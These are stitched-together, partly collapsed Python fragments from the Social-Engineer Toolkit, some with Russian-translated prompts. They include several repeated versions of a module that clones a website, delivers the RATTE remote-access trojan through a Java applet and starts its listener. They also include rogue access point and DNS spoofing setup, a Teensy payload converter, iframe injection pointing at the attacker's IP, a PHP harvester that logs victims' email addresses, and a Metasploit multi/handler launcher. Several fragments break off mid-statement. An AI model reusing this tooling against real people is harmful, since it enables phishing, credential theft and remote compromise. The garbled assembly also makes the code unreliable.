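        except ValueError:
            port = default
        if not_equal is not None and port == not_equal:
            core.print_warning("Port must not be equal to javaport!")
        elif port < 1:
            core.print_warning(text.PORT_NOT_ZERO)
        elif port > 65535:
            core.print_warning(text.PORT_TOO_HIGH)
        else:
            return port


def main():
    """Clone a site, deliver RATTE via the Java applet attack and run its listener.

    Input is interactive (``raw_input``; this module is Python 2).  Three bad
    answers for the site or the callback IP abort the module.  Port prompts
    default to 80 (applet) and 8080 (RATTE).  Returns None.
    """
    import shutil  # stdlib; replaces the "cp ..." shell command below

    website = _ask_website()
    if website is None:
        return
    ipaddr = _ask_callback_ip()
    if ipaddr is None:
        return

    # javaport must be 80, cause applet uses in web injection port 80 to download payload!
    javaport = _ask_port("Port Java applet should listen on [80]", 80)
    ratteport = _ask_port("Port RATTE Server should listen on [8080]", 8080, not_equal=javaport)

    persistent = core.yesno_prompt(["9","2"], "Should RATTE be persistentententent [no|yes]?")
    customexe = raw_input(core.setprompt(["9", "2"], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))

    #######################################
    # prepare RATTE
    #######################################
    prepare_ratte(ipaddr, ratteport, persistent, customexe)

    ######################################
    # Java Applet Attack to deploy RATTE
    #######################################
    core.print_info("Starting java applet attack...")
    java_applet_attack_tw(website, javaport, "reports/", ipaddr)

    # the applet attack records the random payload name; the last line wins.
    # (previously read with file() and never closed)
    ratte_random = None
    with open("%s/src/program_junk/rand_gen" % (definepath), "r") as fileopen:
        for line in fileopen:
            ratte_random = line.rstrip()
    if not ratte_random:
        # the original hit a NameError on the copy below in this case
        core.print_error("rand_gen is empty; cannot place ratteM.exe in reports/")
        return
    # in-process copy instead of "cp" through a shell: no quoting concerns if
    # definepath or the random name ever contain shell metacharacters
    shutil.copyfile("%s/src/program_junk/ratteM.exe" % (definepath),
                    "%s/reports/%s" % (definepath, ratte_random))

    #######################
    # start ratteserver
    #######################
    core.print_info("Starting ratteserver...")
    ratte_listener_start(ratteport)

    ######################
    # stop webserver
    ######################
    stop_web_server_tw()
    return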
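import time
import src.core.setcore as core
from src.core.menu import text
# /etc/setoolkit is added to sys.path so set_config can be imported as a
# Python module -- the file is executed, not merely read.
# NOTE(review): SET usually runs as root; a group/world-writable set_config
# is therefore root code execution.  Permissions are not checked here.
sys.path.append("/etc/setoolkit")
from set_config import AIRBASE_NG_PATH as airbase_path
from set_config import ACCESS_POINT_SSID as access_point
from set_config import AP_CHANNEL as ap_channel
from set_config import DNSSPOOF_PATH as dnsspoof_path
sys.path.append(core.definepath)
# Python 2: raw_input returns a string instead of evaluating the answer.
# Catch only NameError (raw_input missing on Python 3) rather than
# everything, so Ctrl-C and real errors are not silently dropped.
try:
    input = raw_input
except NameError:
    pass
if not os.path.isfile("/etc/init.d/isc-dhcp-server"):
    core.print_warning("isc-dhcp-server does not appear to be installed.")
    core.print_warning("apt-get install isc-dhcp-server to install it. Things may fail now.")
# prefer the configured dnsspoof, then the Debian default, else give up
if not os.path.isfile(dnsspoof_path):
    if os.path.isfile("/usr/sbin/dnsspoof"):
        dnsspoof_path = "/usr/sbin/dnsspoof"
    else:
        core.print_warning("DNSSpoof was not found. Please install or correct path in set_config. Exiting....")
        core.exit_set()
# relative path: presumably SET is always started from its install root
if not os.path.isfile(airbase_path):
    airbase_path = "src/wireless/airbase-ng"
    core.print_info("using SET's local airbase-ng binary")
core.print_info("For this attack to work properly, we must edit the isc-dhcp-server file to include our wireless interface.")
core.print_info("""This will allow isc-dhcp-server to properly assign IPs. (INTERFACES="at0")""")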
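It works by reading natively off the SDCard into a buffer space thats then written out through the keyboard. """)
# if we hit here we are good since msfvenom is installed
print(""" .-. .-. . . .-. .-. .-. .-. .-. . . .-. .-. .-. |.. |-| |\| |.. `-. | |- |( |\/| | | | )|- `-' ` ' ' ` `-' `-' ' `-' ' ' ' ` `-' `-' `-' enabled.\n""")
# grab the path and filename from user, re-asking until the file exists
path = input(core.setprompt(["6"], "Path to the file you want deployed on the teensy SDCard"))
while not os.path.isfile(path):
    core.print_warning("Filename not found, try again")
    path = input(core.setprompt(["6"], "Path to the file you want deployed on the teensy SDCard"))
core.print_warning("Note: This will only deliver the payload, you are in charge of creating the listener if applicable.")
core.print_status("Converting the executable to a hexadecimal form to be converted later...")
with open(path, "rb") as fileopen:
    data = fileopen.read()
# BUG FIX: hexlify returns *bytes* on Python 3 while converts.txt is opened in
# text mode, so the write raised TypeError.  Hex digits are pure ASCII, and on
# Python 2 the decode only turns the str into an equivalent unicode string.
data = binascii.hexlify(data).decode("ascii")
with open("converts.txt", "w") as filewrite:
    filewrite.write(data)
print("[*] File converted successfully. It has been exported in the working directory under 'converts.txt'. "
      "Copy this one file to the teensy SDCard.")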
def web_server_start(): # define if use apache or not apache = False # open set_config here apache_check = core.check_config("APACHE_SERVER=").lower() if apache_check == "on" or track_email == "on": apache_path = core.check_config("APACHE_DIRECTORY=") if os.path.isdir(os.path.join(apache_path, "html")): os.path.join(apache_path, "html") apache = True if operating_system == "windows": apache = False # specify the web port web_port = core.check_config("WEB_PORT=") # see if exploit requires webdav if os.path.isfile(os.path.join(core.setdir, "meta_config")): with open(os.path.join(core.setdir, "meta_config")) as fileopen: for line in fileopen: line = line.rstrip() match = re.search("set SRVPORT 80", line) if match: match2 = re.search("set SRVPORT 8080", line) if not match2: web_port = 8080 # check ip address if core.check_options("IPADDR=") != 0: ipaddr = core.check_options("IPADDR=") else: ipaddr = input("Enter your ip address: ") # unless we create template do self template = "SELF" # Grab custom or set defined if os.path.isfile(os.path.join(core.setdir, "site.template")): with open(core.setdir, "site.template") as fileopen: for line in fileopen: line = line.rstrip() template_match = re.search("TEMPLATE=", line) url_match = re.search("URL=", line) if url_match: # define url to clone here url = line.split("=")[1].rstrip() if template_match: template = line.split("=")[1] # if attach vector isn't set just set a default template attack_vector = "nada" # grab web attack selection if os.path.isfile(os.path.join(core.setdir, "attack_vector")): with open(os.path.join(core.setdir, "attack_vector")) as fileopen: for line in fileopen: attack_vector = line.rstrip() # Sticking it to A/V below rand_gen = random_string() # check multiattack flags here multiattack_harv = "off" if os.path.isfile(os.path.join(core.setdir, "multi_harvester")): multiattack_harv = "on" if os.path.isfile(os.path.join(core.setdir, "/multi_tabnabbing")): multiattack_harv = "on" # If SET is setting up the 
website for you, get the website ready for # delivery if template == "SET": # change to that directory os.chdir("src/html/") # remove stale index.html files if os.path.isfile("index.html"): os.remove("index.html") # define files and get ipaddress set in index.html if attack_vector == "java": with open("index.template") as fileopen, \ open("index.html", "w") as filewrite: for line in fileopen: match1 = re.search("msf.exe", line) if match1: line = line.replace("msf.exe", rand_gen) match = re.search("ipaddrhere", line) if match: line = line.replace("ipaddrhere", ipaddr) filewrite.write(line) # move random generated name shutil.copyfile("msf.exe", rand_gen) # define browser attack vector here if attack_vector == "browser": with open("index.template") as fileopen, \ open("index.html", "w") as filewrite: for line in fileopen: counter = 0 match = re.search(applet_name, line) if match: line = line.replace(applet_name, "invalid.jar") filewrite.write(line) counter = 1 match2 = re.search("<head>", line) if match2: if web_port != 8080: line = line.replace( "<head>", '<head><iframe src ="http://{0}:8080/" width="100" height="100" scrolling="no"></iframe>' .format(ipaddr)) filewrite.write(line) counter = 1 if web_port == 8080: line = line.replace( "<head>", '<head><iframe src = "http://{0}:80/" width="100" height="100" scrolling="no" ></iframe>' .format(ipaddr)) filewrite.write(line) counter = 1 if counter == 0: filewrite.write(line) if template == "CUSTOM" or template == "SELF": # Bring our files to our directory if attack_vector != 'hid' and attack_vector != 'hijacking': print(core.bcolors.YELLOW + "[*] Moving payload into cloned website." 
+ core.bcolors.ENDC) # copy all the files needed if not os.path.isfile(os.path.join(core.setdir, applet_name)): shutil.copyfile( os.path.join(definepath, "src/html/Signed_Update.jar.orig"), os.path.join(core.setdir, applet_name)) shutil.copyfile( os.path.join(core.setdir, applet_name), os.path.join(core.setdir, "web_clone", applet_name)) if os.path.isfile(os.path.join(definepath, "src/html/nix.bin")): nix = core.check_options("NIX.BIN=") shutil.copyfile(os.path.join(definepath, "src/html/nix.bin"), os.path.join(core.setdir, "web_clone", nix)) if os.path.isfile(os.path.join(definepath, "src/html/mac.bin")): mac = core.check_options("MAC.BIN=") shutil.copyfile(os.path.join(definepath, "src/html/mac.bin"), os.path.join(core.setdir, "web_clone", mac)) if os.path.isfile(os.path.join(core.setdir, "msf.exe")): win = core.check_options("MSF.EXE=") shutil.copyfile(os.path.join(core.setdir, "msf.exe"), os.path.join(core.setdir, "web_clone", win)) # pull random name generation core.print_status( "The site has been moved. SET Web Server is now listening..") rand_gen = core.check_options("MSF_EXE=") if rand_gen: if os.path.isfile(os.path.join(core.setdir, "custom.exe")): shutil.copyfile( os.path.join(core.setdir, "msf.exe"), os.path.join(core.setdir, "web_clone/msf.exe")) print( "\n[*] Website has been cloned and custom payload imported. 
Have someone browse your site now" ) shutil.copyfile( os.path.join(core.setdir, "web_clone/msf.exe"), os.path.join(core.setdir, "web_clone", rand_gen)) # if docbase exploit do some funky stuff to get it to work right if os.path.isfile(os.path.join(core.setdir, "docbase.file")): docbase = ( r"""<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd"> <HTML> <HEAD> <TITLE></TITLE> </HEAD> <FRAMESET rows="99%%, 1%%"> <FRAME src="site.html"> <FRAME name=docbase noresize borders=0 scrolling=no src="http://{0}:8080"> </FRAMESET> </HTML>""".format(ipaddr)) if os.path.isfile(os.path.join(core.setdir, "web_clone/site.html")): os.remove(os.path.join(core.setdir, "web_clone/site.html")) shutil.copyfile(os.path.join(core.setdir, "web_clone/index.html"), os.path.join(core.setdir, "web_clone/site.html")) with open(core.setdir + "/web_clone/index.html", "w") as filewrite: filewrite.write(docbase) ########################################################################## # # START WEB SERVER STUFF HERE # ########################################################################## if not apache: if multiattack_harv == 'off': try: # specify port listener here # specify the path for the SET web directories for the applet # attack path = os.path.join(core.setdir, "web_clone/") try: import src.core.webserver as webserver p = multiprocessing.Process(target=webserver.start_server, args=(web_port, path)) p.start() except: thread.start_new_thread(webserver.start_server, (web_port, path)) # Handle KeyboardInterrupt except KeyboardInterrupt: core.exit_set() # Handle Exceptions except Exception as e: core.log(e) print( "{0}[!] ERROR: You probably have something running on port 80 already, Apache??" "[!] There was an issue, printing error: {1}{2}".format( core.bcolors.RED, e, core.bcolors.ENDC)) stop_apache = input("Attempt to stop Apache? 
y/n: ") if stop_apache == "yes" or stop_apache == "y" or stop_apache == "": subprocess.Popen("/etc/init.d/apache2 stop", shell=True).wait() try: # specify port listener here import src.core.webserver as webserver # specify the path for the SET web directories for the # applet attack path = os.path.join(core.setdir + "web_clone") p = multiprocessing.Process( target=webserver.start_server, args=(web_port, path)) p.start() except: print("{0}[!] UNABLE TO STOP APACHE! Exiting...{1}". format(core.bcolors.RED, core.bcolors.ENDC)) sys.exit() # if we are custom, put a pause here to not terminate thread on web # server if template == "CUSTOM" or template == "SELF": custom_exe = core.check_options("CUSTOM_EXE=") if custom_exe: while True: # try block inside of loop, if control-c detected, then # exit try: core.print_warning( "Note that if you are using a CUSTOM payload. YOU NEED TO CREATE A LISTENER!!!!!" ) input( "\n{0}[*] Web Server is listening. Press Control-C to exit.{1}" .format(core.bcolors.GREEN, core.bcolors.ENDC)) # handle keyboard interrupt except KeyboardInterrupt: print("{0}[*] Returning to main menu.{1}".format( core.bcolors.GREEN, core.bcolors.ENDC)) break if apache: subprocess.Popen("cp {0} {apache_path};" "cp {1} {apache_path};" "cp {2} {apache_path};" "cp {3} {apache_path};" "cp {4} {apache_path}".format( os.path.join(definepath, "src/html/*.bin"), os.path.join(definepath, "src/html/*.html"), os.path.join(core.setdir, "web_clone/*"), os.path.join(core.setdir, "msf.exe"), os.path.join(core.setdir, "*.jar"), apache_path=apache_path), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE).wait() # if we are tracking users if track_email == "on": now = datetime.datetime.today() with open( os.path.join(apache_path, "harvester_{}.txt".format(now)), 'w') as filewrite: filewrite.write("") subprocess.Popen("chown www-data:www-data '{0}'".format( os.path.join(apache_path, "harvester_{}.txt".format(now))), shell=True).wait() # here we specify if we are tracking 
users and such with open(os.path.join(apache_path, "index.html")) as fileopen: data = fileopen.read() data = data.replace( "<body>", "<body>" "<?php $file = 'harvester_{0}.txt'; $queryString = ''; foreach ($_GET as $key => $value) {{ $queryString .= $key . '=' . $value . '&';}}$query_string = base64_decode($queryString);file_put_contents($file, print_r(\"Email address recorded: \" . $query_string . \"\\n\", true), FILE_APPEND);?>\n" "/* If you are just seeing plain text you need to install php5 for apache apt-get install libapache2-mod-php5 */" .format(now)) with open(os.path.join(apache_path, "index.php"), "w") as filewrite: filewrite.write(data) core.print_status( "All files have been copied to {}".format(apache_path)) ########################################################################## # # END WEB SERVER STUFF HERE # ########################################################################## if operating_system != "windows": # Grab metaspoit path msf_path = core.meta_path()
if os.path.isfile("/etc/init.d/apache2"): apache_stop = input( "[!] Apache may be running, do you want SET to stop the process? [y/n]: " ) if apache_stop.lower() == "y" or apache_stop.lower( ) == "yes": core.print_status( "Attempting to stop apache.. One moment..") # stop apache here subprocess.Popen("/etc/init.d/apache2 stop", shell=True).wait() try: ipaddr.connect(('localhost', web_port)) if ipaddr: core.print_warning( "If you want to use Apache, edit the /etc/setoolkit/set.config" ) core.print_error( "Exit whatever is listening and restart SET" ) core.exit_set() # if it couldn't connect to localhost, we are good to # go and continue forward except: core.print_status( "Success! Apache was stopped. Moving forward within SET..." ) # if we don't want to stop apache then exit SET and flag # user if apache_stop.lower() == "n" or apache_stop.lower(
'-genkey ' '-alias MyCert ' '-keyalg RSA ' '-keysize 2048 ' '-dname "CN={a1},O={a2},C={a3},ST={a4},L={a5}"'.format(a1=answer1, a2=answer2, a3=answer3, a4=answer4, a5=answer5), shell=True).wait() core.print_info("Exporting the cert request to text file...") # generate the request and export to certreq subprocess.Popen("keytool -certreq -alias MyCert > {}".format(os.path.join(definepath, "certreq.txt")), shell=True).wait() core.print_status("Export successful. Exported certificate under the SET root under certreq.txt") core.print_warning("You will now need to pay for a code signing certificate through Verisign/Thawte/GoDaddy/etc.") core.print_warning("Be sure to purchase a code signing certificate, not a normal website SSL certificate.") core.print_info("When finished, enter the path to the .cer file below") # cert_path is used for the certificate path when generating cert_path = input(core.setprompt("0", "Path for the code signing certificate file (.spc file)")) # if we can't find the filename if not os.path.isfile(cert_path): while True: core.print_error("ERROR:Filename not found. Please try again.") # re-prompt if file name doesn't exist cert_path = input(core.setprompt("0", "Path to the .cer certificate file from Verisign")) # if we detect file, then break out of loop if os.path.isfile(cert_path): break
# if we want to launch payload and automatically create listener if trigger in [1, 2, 3]: choice1 = core.yesno_prompt("0", "Create a listener right now [yes|no]") if choice1.lower() == "yes" or choice1.lower() == "y": # if we used something to create other than solo.py then write out the # listener if not os.path.isfile(os.path.join(core.setdir, "meta_config")): with open(os.path.join(core.setdir, "meta_config"), 'w') as filewrite, \ open(os.path.join(core.setdir, "payload.options")) as fileopen: for line in fileopen: line = line.split(" ") filewrite.write("use multi/handler\n") filewrite.write("set payload {0}\n".format(line[0])) filewrite.write("set lhost {0}\n".format(line[1])) filewrite.write("set lport {0}\n".format(line[2])) filewrite.write("set ExitOnSession false\n") filewrite.write("exploit -j\r\n\r\n") # create the listener core.print_status( "Launching Metasploit.. This could take a few. Be patient! Or else no shells for you.." ) subprocess.Popen("{0} -r {1}".format( os.path.join(msf_path, "msfconsole"), os.path.join(core.setdir, "meta_config")), shell=True).wait() else: core.print_warning("cancelling...") sleep(2)
def main():
    """Collect RATTE settings interactively, build the payload, then offer to start its listener.

    Prompts (user-facing text is in Russian) for the callback IP address, the
    RATTE server port, the persistence flag and an optional executable name,
    then passes them to ``prepare_ratte``. Returns early after three invalid
    IP entries.
    """
    valid_site = False  # not used in this module
    valid_ip = False
    # Shared by both yes/no prompt loops below -- see the NOTE before the
    # second loop.
    valid_response = False
    input_counter = 0

    #################
    # get User Input
    #################
    # ipaddr=input(setprompt(["9", "2"], "IP address to connect back on"))
    # Up to three attempts at a valid IP; the third failure abandons the module.
    while valid_ip != True and input_counter < 3:
        ipaddr = input(
            core.setprompt(["9", "2"], "Введите IP-адрес для подключения"))
        valid_ip = core.validate_ip(ipaddr)
        if not valid_ip:
            if input_counter == 2:
                core.print_error(
                    "\nМожет быть, вы неправильно написали адрес?")
                sleep(4)
                return
            else:
                input_counter += 1

    # try:
    #     ratteport=int(input(setprompt(["9", "2"], "Port RATTE Server should listen on")))
    #     while ratteport==0 or ratteport > 65535:
    #         print_warning('Port must not be equal to javaport!')
    #         ratteport=int(input(setprompt(["9", "2"], "Enter port RATTE Server should listen on")))
    # except ValueError:
    #     ratteport=8080

    # Port prompt: 0 and values above 65535 are re-prompted; negative values
    # are not rejected. Any non-integer input (first prompt or re-prompt)
    # falls through to the default of 8080.
    try:
        ratteport = int(
            input(
                core.setprompt(
                    ["9", "2"],
                    "Порт RATTE Server должен прослушивать [8080]")))
        while ratteport == 0 or ratteport > 65535:
            if ratteport == 0:
                core.print_warning(text.PORT_NOT_ZERO)
            if ratteport > 65535:
                core.print_warning(text.PORT_TOO_HIGH)
            ratteport = int(
                input(
                    core.setprompt(
                        ["9", "2"],
                        "Введите порт RATTE Сервер должен прослушивать [8080]")
                ))
    except ValueError:
        # core.print_info("Port set to default of 8080")
        ratteport = 8080

    # persistent=input(setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
    # if persistent == 'no' or persistent == '' or persistent == 'n':
    #     persistent='NO'
    # else:
    #     persistent='YES'
    # Normalise the yes/no answer to the literal "NO"/"YES" expected by
    # prepare_ratte; anything else re-prompts.
    while not valid_response:
        persistent = input(
            core.setprompt(["9", "2"],
                           "Должен ли RATTE быть постоянным [no|yes]?"))
        persistent = str.lower(persistent)
        if persistent == "no" or persistent == "n":
            persistent = "NO"
            valid_response = True
        elif persistent == "yes" or persistent == "y":
            persistent = "YES"
            valid_response = True
        else:
            core.print_warning(text.YES_NO_RESPONSES)
            valid_response = False

    customexe = input(
        core.setprompt([
            "9", "2"
        ], "Используйте конкретное имя файла (например, firefox.exe) [filename.exe или пусто]?"
                       ))

    ############
    # prepare RATTE
    ############
    prepare_ratte(ipaddr, ratteport, persistent, customexe)
    core.print_status("Полезная нагрузка была экспортирована в %s" %
                      os.path.join(core.userconfigpath, "ratteM.exe"))

    ###################
    # start ratteserver
    ###################
    # prompt=input(setprompt(["9", "2"], "Start the ratteserver listener now [yes|no]"))
    # if prompt == "yes" or prompt == "" or prompt == "y":
    #     print_info("Starting ratteserver...")
    #     ratte_listener_start(ratteport)
    # NOTE(review): valid_response is already True when the persistence loop
    # above exits, so this loop body never runs and the listener prompt is
    # never shown; a separate flag (or resetting valid_response) is needed
    # for it to take effect.
    while not valid_response:
        prompt = input(
            core.setprompt(["9", "2"],
                           "Запустите слушатель ratteserver сейчас [yes|no]"))
        prompt = str.lower(prompt)
        if prompt == "no" or prompt == "n":
            # prompt = "NO"
            core.print_error("Aborting...")
            sleep(2)
            valid_response = True
        elif prompt == "yes" or prompt == "y":
            core.print_info("Старт ратсервер...")
            ratte_listener_start(ratteport)
            core.print_info("Остановка ратсервера...")
            sleep(2)
            valid_response = True
        else:
            core.print_warning(
                "действительные ответы 'n|y|N|Y|no|yes|No|Yes|NO|YES'")
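# check the config file
# Defaults so that a config missing either key cannot leave these names unbound
# for the code that reads them later; UPX packing is off unless enabled.
upx_encode = "OFF"
upx_path = ""
# The config is scanned line by line; a context manager releases the handle
# once the scan is done (the original handle was never closed).
with open("config/set_config", "r") as fileopen:
    for line in fileopen:
        line = line.rstrip()
        # define if we use upx encoding or not
        match = re.search("UPX_ENCODE=", line)
        if match:
            upx_encode = line.replace("UPX_ENCODE=", "")
        # set the upx flag
        match1 = re.search("UPX_PATH=", line)
        if match1:
            upx_path = line.replace("UPX_PATH=", "")
            if upx_encode == "ON":
                if not os.path.isfile(upx_path):
                    if operating_system != "windows":
                        setcore.print_warning("UPX packer not found in the pathname specified in config. Disabling UPX packing for executable")
                        # Was `upx_encode == "OFF"` -- a comparison whose result was
                        # discarded, so packing stayed enabled despite the warning.
                        upx_encode = "OFF"
        # if we removed the set shells to free up space, needed for pwniexpress
        match2 = re.search("SET_INTERACTIVE_SHELL=", line)
        if match2:
            line = line.replace("SET_INTERACTIVE_SHELL=", "").lower()
            if line == "off":
                sys.exit("\n [-] SET Interactive Mode is set to DISABLED. Please change it in the SET config")

# make directory if it's not there
if not os.path.isdir("src/program_junk/web_clone/"):
    os.makedirs("src/program_junk/web_clone/")

# grab ip address and SET web server interface
# The handle is left open on purpose: the code following this block iterates
# over `fileopen`.
if os.path.isfile("src/program_junk/interface"):
    fileopen = open("src/program_junk/interface", "r")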
def main():
    """Prompt for the RATTE/Java-applet settings, build the payload and run the listener.

    Collects a site URL, a callback IP, the applet and RATTE ports, the
    persistence flag and an optional executable name, then calls
    ``prepare_ratte``, ``java_applet_attack_tw`` and ``ratte_listener_start``
    in turn. Returns early after three invalid URL or IP entries.
    """
    valid_site = False
    valid_ip = False
    valid_persistence = False  # only referenced by the commented-out block below
    input_counter = 0
    site_input_counter = 0
    #pause=raw_input("This module has finished completing. Press <enter> to continue")

    # Get a *VALID* website address
    # Accepted only when the scheme is http/https and a network location is
    # present; the third failure abandons the module.
    while valid_site != True and site_input_counter < 3:
        website = raw_input(
            core.setprompt(["9", "2"],
                           "Enter website to clone (ex. https://gmail.com)"))
        site = urlparse.urlparse(website)
        if site.scheme == "http" or site.scheme == "https":
            if site.netloc != "":
                valid_site = True
            else:
                if site_input_counter == 2:
                    core.print_error(
                        "\nMaybe you have the address written down wrong?" +
                        core.bcolors.ENDC)
                    sleep(4)
                    return
                else:
                    core.print_warning(
                        "I can't determine the fqdn or IP of the site. Try again?"
                    )
                    site_input_counter += 1
        else:
            if site_input_counter == 2:
                core.print_error(
                    "\nMaybe you have the address written down wrong?")
                sleep(4)
                return
            else:
                core.print_warning(
                    "I couldn't determine whether this is an http or https site. Try again?"
                )
                site_input_counter += 1

    #core.DebugInfo("site.scheme is: %s " % site.scheme)
    #core.DebugInfo("site.netloc is: %s " % site.netloc)
    #core.DebugInfo("site.path is: %s " % site.path)
    #core.DebugInfo("site.params are: %s " % site.params)
    #core.DebugInfo("site.query is: %s " % site.query)
    #core.DebugInfo("site.fragment is: %s " % site.fragment)

    # Up to three attempts at a valid IP; the third failure abandons the module.
    while valid_ip != True and input_counter < 3:
        ipaddr = raw_input(
            core.setprompt(["9", "2"],
                           "Enter the IP address to connect back on"))
        valid_ip = core.validate_ip(ipaddr)
        if not valid_ip:
            if input_counter == 2:
                core.print_error(
                    "\nMaybe you have the address written down wrong?")
                sleep(4)
                return
            else:
                input_counter += 1

    #javaport must be 80, cause applet uses in web injection port 80 to download payload!
    # Port prompts: 0 and values above 65535 are re-prompted; negative values
    # are not rejected. Any non-integer input (first prompt or re-prompt)
    # falls through to the default.
    try:
        javaport = int(
            raw_input(
                core.setprompt(["9", "2"],
                               "Port Java applet should listen on [80]")))
        while javaport == 0 or javaport > 65535:
            if javaport == 0:
                core.print_warning(text.PORT_NOT_ZERO)
            if javaport > 65535:
                core.print_warning(text.PORT_TOO_HIGH)
            javaport = int(
                raw_input(
                    core.setprompt(["9", "2"],
                                   "Port Java applet should listen on [80]")))
    except ValueError:
        #core.print_info("Port set to default of 80")
        javaport = 80
    #javaport=80

    # The RATTE port must additionally differ from javaport.
    try:
        ratteport = int(
            raw_input(
                core.setprompt(["9", "2"],
                               "Port RATTE Server should listen on [8080]")))
        while ratteport == javaport or ratteport == 0 or ratteport > 65535:
            if ratteport == javaport:
                core.print_warning("Port must not be equal to javaport!")
            if ratteport == 0:
                core.print_warning(text.PORT_NOT_ZERO)
            if ratteport > 65535:
                core.print_warning(text.PORT_TOO_HIGH)
            ratteport = int(
                raw_input(
                    core.setprompt(
                        ["9", "2"],
                        "Port RATTE Server should listen on [8080]")))
    except ValueError:
        ratteport = 8080

    # NOTE(review): the prompt text contains a typo ("persistentententent").
    persistent = core.yesno_prompt(
        ["9", "2"], "Should RATTE be persistentententent [no|yes]?")  # j0fer 06-27-2012
    # while valid_persistence != True:  # j0fer 06-27-2012
    #     persistent=raw_input(core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))  # j0fer 06-27-2012
    #     persistent=str.lower(persistent)  # j0fer 06-27-2012
    #     if persistent == "no" or persistent == "n":  # j0fer 06-27-2012
    #         persistent="NO"  # j0fer 06-27-2012
    #         valid_persistence = True  # j0fer 06-27-2012
    #     elif persistent == "yes" or persistent == "y":  # j0fer 06-27-2012
    #         persistent="YES"  # j0fer 06-27-2012
    #         valid_persistence = True  # j0fer 06-27-2012
    #     else:  # j0fer 06-27-2012
    #         core.print_warning(text.YES_NO_RESPONSES)

    customexe = raw_input(
        core.setprompt([
            "9", "2"
        ], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))

    #######################################
    # prepare RATTE
    #######################################
    prepare_ratte(ipaddr, ratteport, persistent, customexe)

    ######################################
    # Java Applet Attack to deploy RATTE
    #######################################
    core.print_info("Starting java applet attack...")
    java_applet_attack_tw(website, javaport, "reports/", ipaddr)
    # NOTE(review): this handle is never closed, and ratte_random stays
    # unbound (NameError below) if rand_gen is empty.
    fileopen = file("%s/src/program_junk/rand_gen" % (definepath), "r")
    for line in fileopen:
        ratte_random = line.rstrip()
    # NOTE(review): shell=True with interpolated paths; a list argv without a
    # shell (or shutil.copy) would avoid word-splitting and metacharacter
    # handling of the file names.
    subprocess.Popen("cp %s/src/program_junk/ratteM.exe %s/reports/%s" %
                     (definepath, definepath, ratte_random),
                     shell=True).wait()

    #######################
    # start ratteserver
    #######################
    core.print_info("Starting ratteserver...")
    ratte_listener_start(ratteport)

    ######################
    # stop webserver
    ######################
    stop_web_server_tw()
    return
def main():
    """Prompt for the RATTE/Java-applet settings, build the payload and run the listener.

    Python 3 port of the module: user-facing text is in Russian. Collects a
    site URL, a callback IP, the applet and RATTE ports, the persistence flag
    and an optional executable name, then calls ``prepare_ratte``,
    ``java_applet_attack_tw`` and ``ratte_listener_start`` in turn. Returns
    early after three invalid URL or IP entries.
    """
    valid_site = False
    valid_ip = False
    # valid_persistence = False
    input_counter = 0
    site_input_counter = 0
    # Pre-bound so the names exist even if the prompt loops below are skipped.
    ipaddr = None
    website = None
    # pause=input("This module has finished completing. Press <enter> to continue")

    # Get a *VALID* website address
    # Accepted only when the scheme is http/https and a network location is
    # present; the third failure abandons the module.
    while not valid_site and site_input_counter < 3:
        website = input(core.setprompt(["9", "2"], "Enter website to clone (ex. https://gmail.com)"))
        site = urlparse(website)
        if site.scheme == "http" or site.scheme == "https":
            if site.netloc != "":
                valid_site = True
            else:
                if site_input_counter == 2:
                    core.print_error("\nМожет быть, вы неправильно записали адрес?" + core.bcolors.ENDC)
                    sleep(4)
                    return
                else:
                    core.print_warning("Я не могу определить fqdn или IP сайта. Попробуй снова?")
                    site_input_counter += 1
        else:
            if site_input_counter == 2:
                core.print_error("\nМожет быть, вы неправильно записали адрес?")
                sleep(4)
                return
            else:
                core.print_warning("Я не мог определить, является ли это http или https сайтом. Попробуй снова?")
                site_input_counter += 1

    # core.DebugInfo("site.scheme is: %s " % site.scheme)
    # core.DebugInfo("site.netloc is: %s " % site.netloc)
    # core.DebugInfo("site.path is: %s " % site.path)
    # core.DebugInfo("site.params are: %s " % site.params)
    # core.DebugInfo("site.query is: %s " % site.query)
    # core.DebugInfo("site.fragment is: %s " % site.fragment)

    # Up to three attempts at a valid IP; the third failure abandons the module.
    while not valid_ip and input_counter < 3:
        ipaddr = input(core.setprompt(["9", "2"], "Введите IP-адрес для подключения"))
        valid_ip = core.validate_ip(ipaddr)
        if not valid_ip:
            if input_counter == 2:
                core.print_error("\nМожет быть, вы неправильно записали адрес?")
                sleep(4)
                return
            else:
                input_counter += 1

    # javaport must be 80, cause applet uses in web injection port 80 to download payload!
    # Port prompts: 0 and values above 65535 are re-prompted; negative values
    # are not rejected. Any non-integer input (first prompt or re-prompt)
    # falls through to the default.
    try:
        javaport = int(input(core.setprompt(["9", "2"], "Апплет порта Java должен слушать [80]")))
        while javaport == 0 or javaport > 65535:
            if javaport == 0:
                core.print_warning(text.PORT_NOT_ZERO)
            if javaport > 65535:
                core.print_warning(text.PORT_TOO_HIGH)
            javaport = int(input(core.setprompt(["9", "2"], "Апплет порта Java должен слушать [80]")))
    except ValueError:
        # core.print_info("Port set to default of 80")
        javaport = 80

    # The RATTE port must additionally differ from javaport.
    try:
        ratteport = int(input(core.setprompt(["9", "2"], "Сервер RATTE порта должен слушать [8080]")))
        while ratteport == javaport or ratteport == 0 or ratteport > 65535:
            if ratteport == javaport:
                core.print_warning("Порт не должен быть равен javaport!")
            if ratteport == 0:
                core.print_warning(text.PORT_NOT_ZERO)
            if ratteport > 65535:
                core.print_warning(text.PORT_TOO_HIGH)
            ratteport = int(input(core.setprompt(["9", "2"], "Сервер RATTE порта должен слушать [8080]")))
    except ValueError:
        ratteport = 8080

    persistent = core.yesno_prompt(["9", "2"], "Должен ли RATTE быть постоянным [no|yes]?")  # j0fer 06-27-2012
    # while valid_persistence != True:  # j0fer 06-27-2012
    #     persistent=input(core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))  # j0fer 06-27-2012
    #     persistent=str.lower(persistent)  # j0fer 06-27-2012
    #     if persistent == "no" or persistent == "n":  # j0fer 06-27-2012
    #         persistent="NO"  # j0fer 06-27-2012
    #         valid_persistence = True  # j0fer 06-27-2012
    #     elif persistent == "yes" or persistent == "y":  # j0fer 06-27-2012
    #         persistent="YES"  # j0fer 06-27-2012
    #         valid_persistence = True  # j0fer 06-27-2012
    #     else:  # j0fer 06-27-2012
